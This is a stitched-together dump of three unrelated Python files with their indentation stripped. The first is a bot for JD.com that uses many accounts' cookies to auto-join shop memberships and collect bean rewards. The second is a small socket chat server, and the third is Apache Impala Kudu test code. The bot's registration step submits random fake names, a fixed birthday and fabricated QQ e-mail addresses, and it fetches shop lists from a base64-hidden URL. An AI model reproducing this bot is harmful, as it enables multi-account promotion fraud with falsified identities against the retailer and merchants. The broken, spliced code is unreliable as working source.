# 记录符合件的shopid到本地文件保存 当前目录:OpenCardlog/shopid-yyyy-mm-dd.txt 或 log-yyyy-mm-dd.txt
def outfile(filename, context, iscover):
"""
:param filename: 文件名 默认txt格式
:param context: 写入内容
:param iscover: 是否覆盖 False or True
:return:
"""
if record == True:
try:
if iscover == False:
with open(pwd + "log/{0}".format(filename), "a+", encoding="utf-8") as f1:
f1.write("{}\n".format(context))
f1.close()
elif iscover == True:
with open(pwd + "{0}".format(filename), "w+", encoding="utf-8") as f1:
f1.write("{}".format(context))
f1.close()
except Exception as e:
print(e)
# 记忆功能 默认双线程
def memoryFun(startNum, threadNum, usernameLabel, username, getallbean, userCount):
global memoryJson
if memory == True:
if usernameLabel == True:
memoryJson['allShopidNum'] = endShopidNum
memoryJson['currUser{}'.format(threadNum)] = username
memoryJson['t{}_startNum'.format(threadNum)] = startNum
memoryJson['allUserCount'] = userCount
if usernameLabel == False:
try:
memoryJson['{}'.format(username)]
memoryJson['{}'.format(username)] += getallbean
except:
memoryJson['{}'.format(username)] = getallbean
try:
memoryJson['{}_ok'.format(username)]
memoryJson['{}_ok'.format(username)] += 1
except:
memoryJson['{}_ok'.format(username)] = 1
try:
if os.path.exists(pwd + "log"):
with open(pwd + "log/memory.json", "w+", encoding="utf-8") as f:
json.dump(memoryJson, f, indent=4)
else:
pass
except Exception as e:
print(e)
# 修复记忆功能一些问题,如记录累计京豆统计显示为0等
def isMemoryEnable():
global memoryJson
memoryJson = getMemory()
# 获取记忆配置
def getMemory():
"""
:return: memoryJson
"""
if os.path.exists(pwd + "log/memory.json"):
with open(pwd + "log/memory.json", "r", encoding="utf-8") as f:
memoryJson = json.load(f)
if len(memoryJson) > 0:
return memoryJson
else:
pass
def rmCount():
if os.path.exists(pwd + "log/入会汇总.txt"):
os.remove(pwd + "log/入会汇总.txt")
if os.path.exists(pwd + "log/memory.json"):
os.remove(pwd + "log/memory.json")
# 判断是否启用记忆功能
def isMemory(memorylabel, startNum1, startNum2, midNum, endNum, pinNameList):
"""
:param memorylabel: 记忆标签
:param startNum1: 线程1默认开始位置
:param startNum2: 线程2默认开始位置
:param midNum: 线程1默认结束位置
:param endNum: 线程2默认结束位置
:return: startNum1, startNum2, memorylabel
"""
if memory == True and memorylabel == 0:
try:
memoryJson = getMemory()
if memoryJson['allShopidNum'] == endNum:
currUserLabel = 0
if memoryJson['allUserCount'] == allUserCount:
for u in pinNameList:
if memoryJson['currUser1'] == u:
currUserLabel += 1
elif memoryJson['currUser2'] == u:
currUserLabel += 1
if memoryJson['currUser1'] == memoryJson['currUser2']:
currUserLabel = 2
if currUserLabel < 2:
print("通知:检测到您配置的CK有变更,本次记忆功能不生效。")
rmCount()
return startNum1, startNum2, memorylabel
if memoryJson['t1_startNum'] + 1 == midNum and memoryJson['t2_startNum'] + 1 == endNum:
print(
f"\n上次已完成所有shopid,\n\nPs:您可以关注公众号或TG频道获取最新shopid。\n公众号: TopStyle\n电报TG:https://t.me/TopStyle2021\n\n请输入 0 或 1\n0 : 退出。\n1 : 重新跑一次,以防有漏")
try:
getyourNum = int(input("正在等待您的选择:"))
if getyourNum == 1:
print("Ok,那就重新跑一次~")
rmCount()
memorylabel = 1
return startNum1, startNum2, memorylabel
elif getyourNum == 0:
print("Ok,已退出~")
time.sleep(10)
exit(0)
except:
# print("Error: 您的输入有误!已退出。")
exitCodeFun(3)
else:
isMemoryEnable()
if memoryJson['t1_startNum']:
startNum1 = memoryJson['t1_startNum']
message(f"已启用记忆功能 memory= True,线程1从第【{startNum1}】店铺开始")
if memoryJson['t2_startNum']:
startNum2 = memoryJson['t2_startNum']
message(f"已启用记忆功能 memory= True,线程2从第【{startNum2}】店铺开始")
memorylabel = 1
return startNum1, startNum2, memorylabel
else:
message("通知:检测到您配置的CK有变更,本次记忆功能不生效。")
rmCount()
return startNum1, startNum2, memorylabel
else:
message("通知:检测到shopid有更新,本次记忆功能不生效。")
rmCount()
memorylabel = 1
return startNum1, startNum2, memorylabel
except Exception as e:
memorylabel = 1
return startNum1, startNum2, memorylabel
else:
rmCount()
memorylabel = 1
return startNum1, startNum2, memorylabel
# 获取VenderId
def getVenderId(shopId, headers):
"""
:param shopId:
:param headers
:return: venderId
"""
url = 'https://mall.jd.com/index-{0}.html'.format(shopId)
resp = requests.get(url=url, verify=False, headers=headers, timeout=60)
resulttext = resp.text
r = re.compile(r'shopId=\d+&id=(\d+)"')
venderId = r.findall(resulttext)
return venderId[0]
# 查询礼包
def getShopOpenCardInfo(venderId, headers, shopid, userName, user_num):
"""
:param venderId:
:param headers:
:return: activityId,getBean 或 返回 0:没豆 1:有豆已是会员 2:记录模式(不入会)
"""
num1 = string.digits
v_num1 = ''.join(random.sample(["1", "2", "3", "4", "5", "6", "7", "8", "9"], 1)) + ''.join(
random.sample(num1, 4)) # 随机生成一窜4位数字
url = 'https://api.m.jd.com/client.action?appid=jd_shop_member&functionId=getShopOpenCardInfo&body=%7B%22venderId%22%3A%22{2}%22%2C%22channel%22%3A406%7D&client=H5&clientVersion=9.2.0&uuid=&jsonp=jsonp_{0}_{1}'.format(
timestamp, v_num1, venderId)
resp = requests.get(url=url, verify=False, headers=headers, timeout=60)
time.sleep(sleepNum)
resulttxt = resp.text
r = re.compile(r'jsonp_.*?\((.*?)\)\;', re.M | re.S | re.I)
result = r.findall(resulttxt)
cardInfo = json.loads(result[0])
venderCardName = cardInfo['result']['shopMemberCardInfo']['venderCardName'] # 店铺名称
if user_num == 1:
printinfo(f"\t└查询入会礼包【{venderCardName}】", printlog)
openCardStatus = cardInfo['result']['userInfo']['openCardStatus'] # 是否会员
interestsRuleList = cardInfo['result']['interestsRuleList']
if interestsRuleList == None:
if user_num == 1:
printinfo("\t\t└查询该店入会没有送豆,不入会", printlog)
return 0, 0
try:
if len(interestsRuleList) > 0:
for i in interestsRuleList:
if "京豆" in i['prizeName']:
getBean = int(i['discountString'])
activityId = i['interestsInfo']['activityId']
context = "{0}".format(shopid)
outfile(f"shopid-{today}.txt", context, False) # 记录所有送豆的shopid
in_url = 'https://shop.m.jd.com/?shopId={}'.format(shopid)
url = 'https://shopmember.m.jd.com/member/memberCloseAccount?venderId={}'.format(venderId)
context = "[{0}]:入会{2}豆店铺【{1}】\n\t加入会员:{4}\n\t解绑会员:{3}".format(nowtime(), venderCardName, getBean,
url, in_url) # 记录
if user_num == 1:
outfile("入会汇总.txt", context, False)
if getBean >= openCardBean: # 判断豆是否符合您的需求
print(f"\t└账号{user_num}【{userName}】{venderCardName}:入会赠送【{getBean}豆】,可入会")
context = "{0}".format(shopid)
outfile(f"入会{openCardBean}豆以上的shopid-{today}.txt", context, False)
if onlyRecord == True:
if user_num == 1:
print("已开启仅记录,不入会。")
return 2, 2
if openCardStatus == 1:
url = 'https://shopmember.m.jd.com/member/memberCloseAccount?venderId={}'.format(venderId)
print("\t\t└[账号:{0}]:您已经是本店会员,请注销会员卡24小时后再来~\n注销链接:{1}".format(userName, url))
context = "[{3}]:入会{1}豆,{0}销卡:{2}".format(venderCardName, getBean, url, nowtime())
outfile("可退会账号【{0}】.txt".format(userName), context, False)
return 1, 1
return activityId, getBean
else:
if user_num == 1:
print(f'\t\t└{venderCardName}:入会送【{getBean}】豆少于【{openCardBean}豆】,不入...')
if onlyRecord == True:
if user_num == 1:
print("已开启仅记录,不入会。")
return 2, 2
return 0, openCardStatus
else:
pass
if user_num == 1:
printinfo("\t\t└查询该店入会没有送豆,不入会", printlog)
return 0, 0
else:
return 0, 0
except Exception as e:
print(e)
# 开卡
def bindWithVender(venderId, shopId, activityId, channel, headers):
"""
:param venderId:
:param shopId:
:param activityId:
:param channel:
:param headers:
:return: result : 开卡结果
"""
num = string.ascii_letters + string.digits
v_name = ''.join(random.sample(num, 10))
num1 = string.digits
v_num1 = ''.join(random.sample(["1", "2", "3", "4", "5", "6", "7", "8", "9"], 1)) + ''.join(random.sample(num1, 4))
qq_num = ''.join(random.sample(["1", "2", "3", "4", "5", "6", "7", "8", "9"], 1)) + ''.join(
random.sample(num1, 8)) + "@qq.com"
url = 'https://api.m.jd.com/client.action?appid=jd_shop_member&functionId=bindWithVender&body=%7B%22venderId%22%3A%22{4}%22%2C%22shopId%22%3A%22{7}%22%2C%22bindByVerifyCodeFlag%22%3A1%2C%22registerExtend%22%3A%7B%22v_sex%22%3A%22%E6%9C%AA%E7%9F%A5%22%2C%22v_name%22%3A%22{0}%22%2C%22v_birthday%22%3A%221990-03-18%22%2C%22v_email%22%3A%22{6}%22%7D%2C%22writeChildFlag%22%3A0%2C%22activityId%22%3A{5}%2C%22channel%22%3A{3}%7D&client=H5&clientVersion=9.2.0&uuid=&jsonp=jsonp_{1}_{2}'.format(
v_name, timestamp, v_num1, channel, venderId, activityId, qq_num, shopId)
try:
respon = requests.get(url=url, verify=False, headers=headers, timeout=60)
result = respon.text
return result
except Exception as e:
print(e)
# 获取开卡结果
def getResult(resulttxt, userName, user_num):
r = re.compile(r'jsonp_.*?\((.*?)\)\;', re.M | re.S | re.I)
result = r.findall(resulttxt)
for i in result:
result_data = json.loads(i)
busiCode = result_data['busiCode']
if busiCode == '0':
message = result_data['message']
try:
result = result_data['result']['giftInfo']['giftList']
print(f"\t\t└账号{user_num}【{userName}】:{message}")
for i in result:
print("\t\t\t└{0}:{1} ".format(i['prizeTypeName'], i['discount']))
except:
print(f'\t\t└账号{user_num}【{userName}】:{message}')
return busiCode
else:
print("\t\t└账号{0}【{1}】:{2}".format(user_num, userName, result_data['message']))
return busiCode
def getRemoteShopid():
global shopidList, venderidList
shopidList = []
venderidList = []
url = base64.decodebytes(
b"aHR0cHM6Ly9naXRlZS5jb20vY3VydGlubHYvUHVibGljL3Jhdy9tYXN0ZXIvT3BlbkNhcmQvc2hvcGlkLnR4dA==")
try:
rShopid = gettext(url)
rShopid = rShopid.split("\n")
for i in rShopid:
if len(i) > 0:
shopidList.append(i.split(':')[0])
venderidList.append(i.split(':')[1])
return shopidList, venderidList
except:
print("无法从远程获取shopid")
exitCodeFun(999)
# 读取shopid.txt
def getShopID():
shopid_path = pwd + "shopid.txt"
try:
with open(shopid_path, "r", encoding="utf-8") as f:
shopid = f.read()
if len(shopid) > 0:
shopid = shopid.split("\n")
return shopid
else:
print("Error:请检查shopid.txt文件是否正常!\n")
exitCodeFun(2)
except Exception as e:
print("Error:请检查shopid.txt文件是否正常!\n", e)
exitCodeFun(2)
# 进度条
def progress_bar(start, end, threadNum):
print("\r", end="")
if threadNum == 2:
start2 = start - midNum
end2 = end - midNum
print("\n###[{1}]:线程{2}【当前进度: {0}%】\n".format(round(start2 / end2 * 100, 2), nowtime(), threadNum))
elif threadNum == 1:
print("\n###[{1}]:线程{2}【当前进度: {0}%】\n".format(round(start / end * 100, 2), nowtime(), threadNum))
sys.stdout.flush()
## 多账号并发
def sss(ii, ck, userName, pinName, endNum, user_num, shopids, threadNum):
if ii % 10 == 0 and ii != 0 and user_num == 1:
progress_bar(ii, endNum, threadNum)
try:
if len(shopids[ii]) > 0:
headers_b = setHeaders(ck, "mall") # 获取请求头
if isRemoteSid:
venderId = venderidList[shopidList.index(shopids[ii])]
else:
venderId = getVenderId(shopids[ii], headers_b) # 获取venderId
time.sleep(sleepNum) # 根据您需求是否限制请求速度
# 新增记忆功能
memoryFun(ii, threadNum, True, pinName, 0, allUserCount)
headers_a = setHeaders(ck, "mh5")
activityId, getBean = getShopOpenCardInfo(venderId, headers_a, shopids[ii], userName, user_num) # 获取入会礼包结果
# activityId,getBean 或 返回 0:没豆 1:有豆已是会员 2:记录模式(不入会)
time.sleep(sleepNum) # 根据账号需求是否限制请求速度
if activityId == 0 or activityId == 2:
pass
elif activityId > 10:
headers = setHeaders(ck, "JDApp")
result = bindWithVender(venderId, shopids[ii], activityId, 208, headers)
busiCode = getResult(result, userName, user_num)
if busiCode == '0':
memoryFun(ii, threadNum, False, pinName, getBean, allUserCount)
memoryJson = getMemory()
print(f"账号{user_num}:【{userName}】累计获得:{memoryJson['{}'.format(pinName)]} 京豆")
time.sleep(sleepNum)
else:
pass
except Exception as e:
if user_num == 1:
print(f"【Error】:多账号并发报错,请求过快建议适当调整 sleepNum 参数限制速度 \n{e}")
# 为多线程准备
def OpenVipCard(startNum: int, endNum: int, shopids, cookies, userNames, pinNameList, threadNum):
sssLabel = 0
for i in range(startNum, endNum):
user_num = 1
if Concurrent:
if sssLabel == 0 and threadNum == 1:
if DoubleThread:
message("当前模式: 双线程,多账号并发运行")
else:
message("当前模式: 单线程,多账号并发运行")
sssLabel = 1
threads = []
for ck, userName, pinName in zip(cookies, userNames, pinNameList):
tt = TaskThread(sss, args=(i, ck, userName, pinName, endNum, user_num, shopids, threadNum))
threads.append(tt)
tt.start()
user_num += 1
time.sleep(sleepNum)
for t in threads:
t.join()
time.sleep(sleepNum)
else:
if sssLabel == 0 and threadNum == 1:
if DoubleThread:
message("当前模式: 双线程,单账号运行")
else:
message("当前模式: 单线程,单账号运行")
sssLabel = 1
activityIdLabel = 0
for ck, userName, pinName in zip(cookies, userNames, pinNameList):
if i % 10 == 0 and i != 0:
progress_bar(i, endNum, threadNum)
try:
if len(shopids[i]) > 0:
headers_b = setHeaders(ck, "mall") # 获取请求头
venderId = getVenderId(shopids[i], headers_b) # 获取venderId
time.sleep(sleepNum) # 根据账号需求是否限制请求速度
# 新增记忆功能
memoryFun(i, threadNum, True, pinName, 0, allUserCount)
if activityIdLabel == 0:
s = random.randint(0, allUserCount - 1)
headers_a = setHeaders(cookies[s], "mh5")
activityId, getBean = getShopOpenCardInfo(venderId, headers_a, shopids[i], userName,
user_num) # 获取入会礼包结果
# activityId,getBean 或 返回 0:没豆 1:有豆已是会员 2:记录模式(不入会)
time.sleep(sleepNum) # 根据账号需求是否限制请求速度
if activityId == 0 or activityId == 2:
break
elif activityId == 1:
user_num += 1
continue
elif activityId > 10:
activityIdLabel = 1
headers = setHeaders(ck, "JDApp")
result = bindWithVender(venderId, shopids[i], activityId, 208, headers)
busiCode = getResult(result, userName, user_num)
if busiCode == '0':
memoryFun(i, threadNum, False, pinName, getBean, allUserCount)
memoryJson = getMemory()
print(f"账号{user_num}:【{userName}】累计获得:{memoryJson['{}'.format(pinName)]} 京豆")
time.sleep(sleepNum)
else:
break
except Exception as e:
user_num += 1
print(e)
continue
user_num += 1
# start
def start():
global allUserCount
print(scriptHeader)
outfile("Readme.md", readmes, True)
isUpdate()
global endShopidNum, midNum, allUserCount
if isRemoteSid:
message("已启用远程获取shopid")
allShopid, venderidList = getRemoteShopid()
else:
message("从本地shopid.txt获取shopid")
allShopid = getShopID()
allShopid = list(set(allShopid))
endShopidNum = len(allShopid)
midNum = int(endShopidNum / 2)
message("获取到店铺数量: {}".format(endShopidNum))
message(f"您已设置入会条件:{openCardBean} 京豆")
print("获取账号...")
cookies, userNames, pinNameList = iscookie()
allUserCount = len(cookies)
message("共{}个有效账号".format(allUserCount))
memorylabel = 0
startNum1 = 0
startNum2 = midNum
starttime = time.perf_counter() # 记录时间开始
if endShopidNum > 1 and DoubleThread:
# 如果启用记忆功能,则获取上一次记忆位置
startNum1, startNum2, memorylabel = isMemory(memorylabel, startNum1, startNum2, midNum, endShopidNum,
pinNameList)
# 多线程部分
threads = []
t1 = Thread(target=OpenVipCard, args=(startNum1, midNum, allShopid, cookies, userNames, pinNameList, 1))
threads.append(t1)
t2 = Thread(target=OpenVipCard, args=(startNum2, endShopidNum, allShopid, cookies, userNames, pinNameList, 2))
threads.append(t2)
try:
for t in threads:
t.setDaemon(True)
t.start()
for t in threads:
t.join()
isSuccess = True
progress_bar(1, 1, 1)
progress_bar(1, 1, 2)
except:
isSuccess = False
elif endShopidNum == 1 or not DoubleThread:
startNum1, startNum2, memorylabel = isMemory(memorylabel, startNum1, startNum2, midNum, endShopidNum,
pinNameList)
OpenVipCard(startNum1, endShopidNum, allShopid, cookies, userNames, pinNameList, 1)
isSuccess = True
else:
message("获取到shopid数量为0")
exitCodeFun(9)
endtime = time.perf_counter() # 记录时间结束
if os.path.exists(pwd + "log/memory.json"):
memoryJson = getMemory()
n = 1
message("\n###【本次统计 {}】###\n".format(nowtime()))
all_get_bean = 0
for name, pinname in zip(userNames, pinNameList):
try:
userCountBean = memoryJson['{}'.format(pinname)]
successJoin = memoryJson['{}_ok'.format(pinname)]
message(f"账号{n}:【{name}】\n\t└成功入会【{successJoin}】个,收获【{userCountBean}】京豆")
all_get_bean += userCountBean
except Exception as e:
message(f"账号{n}:【{name}】\n\t└成功入会【0】个,收获【0】京豆")
n += 1
message(f"\n本次总累计获得:{all_get_bean} 京豆")
time.sleep(1)
message("\n------- 入会总耗时 : %.03f 秒 seconds -------" % (endtime - starttime))
print("{0}\n{1}\n{2}".format("*" * 30, scriptHeader, remarks))
send("【JD入会领豆】", message_info)
exitCodeFun(0)
if __name__ == '__main__':
start()
|
Server.py | import socket
import threading
PORT = 5050
SERVER = socket.gethostbyname(socket.gethostname())
FORMAT = 'ascii'
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((SERVER, PORT))
server.listen()
clients = []
nicknames = []
def broadcast(message):
for client in clients:
client.send(message)
def handle_client(client):
while True:
try:
message = client.recv(1024)
broadcast(message)
except:
index = clients.index(client)
clients.remove(client)
client.close()
nickname = nicknames[index]
nicknames.remove(nickname)
break
def receive():
while True:
client, addr = server.accept()
print(f"Connected with {str(addr)}")
client.send('WEB'.encode(FORMAT))
nickname = client.recv(1024).decode(FORMAT)
nicknames.append(nickname)
clients.append(client)
print(f"Nickname of the client is {nickname}!")
broadcast(f"{nickname} joined the Chat!".encode(FORMAT))
client.send("Connected to the Server!".encode(FORMAT))
thread = threading.Thread(target = handle_client, args = (client,))
thread.start()
print("[STARTING] Starting the Server...")
receive()
|
test_kudu.py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from kudu.schema import (
BOOL,
DOUBLE,
FLOAT,
INT16,
INT32,
INT64,
INT8,
SchemaBuilder,
STRING,
BINARY,
UNIXTIME_MICROS)
from kudu.client import Partitioning
from kudu.util import to_unixtime_micros
import logging
import pytest
import random
import re
import textwrap
import threading
import time
from datetime import datetime, date
from pytz import utc
from tests.common.environ import ImpalaTestClusterProperties, HIVE_MAJOR_VERSION
from tests.common.kudu_test_suite import KuduTestSuite
from tests.common.impala_cluster import ImpalaCluster
from tests.common.skip import SkipIfNotHdfsMinicluster, SkipIfKudu, SkipIfHive2
from tests.common.test_dimensions import (add_exec_option_dimension,
extend_exec_option_dimension)
from tests.verifiers.metric_verifier import MetricVerifier
KUDU_MASTER_HOSTS = pytest.config.option.kudu_master_hosts
IMPALA_TEST_CLUSTER_PROPERTIES = ImpalaTestClusterProperties.get_instance()
LOG = logging.getLogger(__name__)
# TODO(IMPALA-8614): parameterize some tests to run with HMS integration enabled.
class TestKuduBasicDML(KuduTestSuite):
"""
This suite tests the basic DML operations when using a kudu table.
"""
@classmethod
def add_test_dimensions(cls):
super(TestKuduBasicDML, cls).add_test_dimensions()
# The default read mode of READ_LATEST does not provide high enough consistency for
# these tests.
add_exec_option_dimension(cls, "kudu_read_mode", "READ_AT_SNAPSHOT")
# Run with and without multithreading to ensure Kudu DML works with both threading
# models. E.g. see IMPALA-9782.
add_exec_option_dimension(cls, "mt_dop", "0")
extend_exec_option_dimension(cls, "mt_dop", "4")
@SkipIfKudu.no_hybrid_clock
def test_kudu_insert(self, vector, unique_database):
self.run_test_case('QueryTest/kudu_insert', vector, use_db=unique_database)
@SkipIfKudu.no_hybrid_clock
def test_kudu_update(self, vector, unique_database):
self.run_test_case('QueryTest/kudu_update', vector, use_db=unique_database)
@SkipIfKudu.no_hybrid_clock
def test_kudu_upsert(self, vector, unique_database):
self.run_test_case('QueryTest/kudu_upsert', vector, use_db=unique_database)
@SkipIfKudu.no_hybrid_clock
def test_kudu_delete(self, vector, unique_database):
self.run_test_case('QueryTest/kudu_delete', vector, use_db=unique_database)
# TODO(IMPALA-8614): parameterize some tests to run with HMS integration enabled.
class TestKuduOperations(KuduTestSuite):
"""
This suite tests the different modification operations when using a kudu table.
"""
@classmethod
def add_test_dimensions(cls):
super(TestKuduOperations, cls).add_test_dimensions()
# The default read mode of READ_LATEST does not provide high enough consistency for
# these tests.
add_exec_option_dimension(cls, "kudu_read_mode", "READ_AT_SNAPSHOT")
@SkipIfKudu.no_hybrid_clock
@SkipIfKudu.hms_integration_enabled
def test_out_of_range_timestamps(self, vector, cursor, kudu_client, unique_database):
"""Test timestamp values that are outside of Impala's supported date range."""
cursor.execute("set kudu_read_mode=READ_AT_SNAPSHOT")
cursor.execute("""CREATE TABLE %s.times (a INT PRIMARY KEY, ts TIMESTAMP)
PARTITION BY HASH(a) PARTITIONS 3 STORED AS KUDU""" % unique_database)
assert kudu_client.table_exists(
KuduTestSuite.to_kudu_table_name(unique_database, "times"))
table = kudu_client.table(KuduTestSuite.to_kudu_table_name(unique_database, "times"))
session = kudu_client.new_session()
session.apply(table.new_insert((0, datetime(1987, 5, 19, 0, 0, tzinfo=utc))))
# Add a date before 1400
session.apply(table.new_insert((1, datetime(1300, 1, 1, 0, 0, tzinfo=utc))))
# TODO: Add a date after 9999. There isn't a way to represent a date greater than
# 9999 in Python datetime.
#session.apply(table.new_insert((2, datetime(12000, 1, 1, 0, 0, tzinfo=utc))))
session.flush()
cursor.execute("set kudu_snapshot_read_timestamp_micros=%s" %
to_unixtime_micros(kudu_client.latest_observed_timestamp()))
# TODO: The test driver should have a way to specify query options in an 'options'
# section rather than having to split abort_on_error cases into separate files.
vector.get_value('exec_option')['abort_on_error'] = 0
self.run_test_case('QueryTest/kudu-overflow-ts', vector,
use_db=unique_database)
vector.get_value('exec_option')['abort_on_error'] = 1
self.run_test_case('QueryTest/kudu-overflow-ts-abort-on-error', vector,
use_db=unique_database)
@SkipIfKudu.no_hybrid_clock
def test_kudu_scan_node(self, vector, unique_database):
self.run_test_case('QueryTest/kudu-scan-node', vector, use_db=unique_database)
@SkipIfNotHdfsMinicluster.tuned_for_minicluster
@SkipIfKudu.no_hybrid_clock
def test_kudu_insert_mem_limit(self, vector, unique_database):
self.run_test_case('QueryTest/kudu_insert_mem_limit', vector, use_db=unique_database)
@SkipIfKudu.no_hybrid_clock
def test_kudu_partition_ddl(self, vector, unique_database):
self.run_test_case('QueryTest/kudu_partition_ddl', vector, use_db=unique_database)
@pytest.mark.skipif(IMPALA_TEST_CLUSTER_PROPERTIES.is_remote_cluster(),
reason="Test references hardcoded hostnames: IMPALA-4873")
@pytest.mark.execute_serially
@SkipIfKudu.no_hybrid_clock
@SkipIfKudu.hms_integration_enabled
def test_kudu_alter_table(self, vector, unique_database):
self.run_test_case('QueryTest/kudu_alter', vector, use_db=unique_database)
@SkipIfKudu.no_hybrid_clock
def test_kudu_stats(self, vector, unique_database):
self.run_test_case('QueryTest/kudu_stats', vector, use_db=unique_database)
@SkipIfKudu.no_hybrid_clock
def test_kudu_describe(self, vector, unique_database):
self.run_test_case('QueryTest/kudu_describe', vector, use_db=unique_database)
@SkipIfKudu.no_hybrid_clock
def test_kudu_limit(self, vector, unique_database):
self.run_test_case('QueryTest/kudu_limit', vector, use_db=unique_database)
def test_kudu_column_options(self, cursor, kudu_client, unique_database):
"""Test Kudu column options"""
encodings = ["ENCODING PLAIN_ENCODING", ""]
compressions = ["COMPRESSION SNAPPY", ""]
nullability = ["NOT NULL", "NULL", ""]
defaults = ["DEFAULT 1", ""]
blocksizes = ["BLOCK_SIZE 32768", ""]
indx = 1
for encoding in encodings:
for compression in compressions:
for default in defaults:
for blocksize in blocksizes:
for nullable in nullability:
impala_tbl_name = "test_column_options_%s" % str(indx)
cursor.execute("""CREATE TABLE %s.%s (a INT PRIMARY KEY
%s %s %s %s, b INT %s %s %s %s %s) PARTITION BY HASH (a)
PARTITIONS 3 STORED AS KUDU""" % (unique_database, impala_tbl_name,
encoding, compression, default, blocksize, nullable, encoding,
compression, default, blocksize))
indx = indx + 1
assert kudu_client.table_exists(
KuduTestSuite.to_kudu_table_name(unique_database, impala_tbl_name))
def test_kudu_col_changed(
self, cursor, kudu_client, unique_database, cluster_properties):
"""Test changing a Kudu column outside of Impala results in a failure on read with
outdated metadata (IMPALA-4828)."""
cursor.execute("set kudu_read_mode=READ_AT_SNAPSHOT")
cursor.execute("""CREATE TABLE %s.foo (a INT PRIMARY KEY, s STRING)
PARTITION BY HASH(a) PARTITIONS 3 STORED AS KUDU""" % unique_database)
assert kudu_client.table_exists(
KuduTestSuite.to_kudu_table_name(unique_database, "foo"))
# Force metadata to be loaded on impalads
cursor.execute("select * from %s.foo" % (unique_database))
# Load the table via the Kudu client and change col 's' to be a different type.
table = kudu_client.table(KuduTestSuite.to_kudu_table_name(unique_database, "foo"))
alterer = kudu_client.new_table_alterer(table)
alterer.drop_column("s")
table = alterer.alter()
alterer = kudu_client.new_table_alterer(table)
alterer.add_column("s", "int32")
table = alterer.alter()
# Add some rows
session = kudu_client.new_session()
for i in range(100):
op = table.new_insert((i, i))
session.apply(op)
session.flush()
cursor.execute("set kudu_snapshot_read_timestamp_micros=%s" %
to_unixtime_micros(kudu_client.latest_observed_timestamp()))
# Scanning should result in an error with Catalog V1, since the metadata is cached.
try:
cursor.execute("SELECT * FROM %s.foo" % (unique_database))
assert cluster_properties.is_catalog_v2_cluster(),\
"Should fail with Catalog V1, which caches metadata"
except Exception as e:
assert not cluster_properties.is_catalog_v2_cluster(),\
"Should succeed with Catalog V2, which does not cache metadata"
expected_error = "Column 's' is type INT but Impala expected STRING. The table "\
"metadata in Impala may be outdated and need to be refreshed."
assert expected_error in str(e)
# After a REFRESH the scan should succeed
cursor.execute("REFRESH %s.foo" % (unique_database))
cursor.execute("SELECT * FROM %s.foo" % (unique_database))
assert len(cursor.fetchall()) == 100
def test_kudu_col_not_null_changed(
self, cursor, kudu_client, unique_database, cluster_properties):
"""Test changing a NOT NULL Kudu column outside of Impala results in a failure
on read with outdated metadata (IMPALA-4828)."""
cursor.execute("set kudu_read_mode=READ_AT_SNAPSHOT")
cursor.execute("""CREATE TABLE %s.foo (a INT PRIMARY KEY, s STRING NOT NULL)
PARTITION BY HASH(a) PARTITIONS 3 STORED AS KUDU""" % unique_database)
assert kudu_client.table_exists(
KuduTestSuite.to_kudu_table_name(unique_database, "foo"))
# Force metadata to be loaded on impalads
cursor.execute("select * from %s.foo" % (unique_database))
# Load the table via the Kudu client and change col 's' to be a different type.
table = kudu_client.table(KuduTestSuite.to_kudu_table_name(unique_database, "foo"))
alterer = kudu_client.new_table_alterer(table)
alterer.drop_column("s")
table = alterer.alter()
alterer = kudu_client.new_table_alterer(table)
alterer.add_column("s", "string", nullable=True)
table = alterer.alter()
# Add some rows
session = kudu_client.new_session()
for i in range(100):
op = table.new_insert((i, None))
session.apply(op)
session.flush()
cursor.execute("set kudu_snapshot_read_timestamp_micros=%s" %
to_unixtime_micros(kudu_client.latest_observed_timestamp()))
# Scanning should result in an error
try:
cursor.execute("SELECT * FROM %s.foo" % (unique_database))
assert cluster_properties.is_catalog_v2_cluster(),\
"Should fail with Catalog V1, which caches metadata"
except Exception as e:
assert not cluster_properties.is_catalog_v2_cluster(),\
"Should succeed with Catalog V2, which does not cache metadata"
expected_error = "Column 's' is nullable but Impala expected it to be "\
"not nullable. The table metadata in Impala may be outdated and need to be "\
"refreshed."
assert expected_error in str(e)
# After a REFRESH the scan should succeed
cursor.execute("REFRESH %s.foo" % (unique_database))
cursor.execute("SELECT * FROM %s.foo" % (unique_database))
assert len(cursor.fetchall()) == 100
def test_kudu_col_null_changed(
self, cursor, kudu_client, unique_database, cluster_properties):
"""Test changing a NULL Kudu column outside of Impala results in a failure
on read with outdated metadata (IMPALA-4828)."""
cursor.execute("set kudu_read_mode=READ_AT_SNAPSHOT")
cursor.execute("""CREATE TABLE %s.foo (a INT PRIMARY KEY, s STRING NULL)
PARTITION BY HASH(a) PARTITIONS 3 STORED AS KUDU""" % unique_database)
assert kudu_client.table_exists(
KuduTestSuite.to_kudu_table_name(unique_database, "foo"))
# Force metadata to be loaded on impalads
cursor.execute("select * from %s.foo" % (unique_database))
# Load the table via the Kudu client and change col 's' to be a different type.
table = kudu_client.table(KuduTestSuite.to_kudu_table_name(unique_database, "foo"))
alterer = kudu_client.new_table_alterer(table)
alterer.drop_column("s")
table = alterer.alter()
alterer = kudu_client.new_table_alterer(table)
alterer.add_column("s", "string", nullable=False, default="bar")
table = alterer.alter()
# Add some rows
session = kudu_client.new_session()
for i in range(100):
op = table.new_insert((i, "foo"))
session.apply(op)
session.flush()
cursor.execute("set kudu_snapshot_read_timestamp_micros=%s" %
to_unixtime_micros(kudu_client.latest_observed_timestamp()))
# Scanning should result in an error
try:
cursor.execute("SELECT * FROM %s.foo" % (unique_database))
assert cluster_properties.is_catalog_v2_cluster(),\
"Should fail with Catalog V1, which caches metadata"
except Exception as e:
assert not cluster_properties.is_catalog_v2_cluster(),\
"Should succeed with Catalog V2, which does not cache metadata"
expected_error = "Column 's' is not nullable but Impala expected it to be "\
"nullable. The table metadata in Impala may be outdated and need to be "\
"refreshed."
assert expected_error in str(e)
# After a REFRESH the scan should succeed
cursor.execute("REFRESH %s.foo" % (unique_database))
cursor.execute("SELECT * FROM %s.foo" % (unique_database))
assert len(cursor.fetchall()) == 100
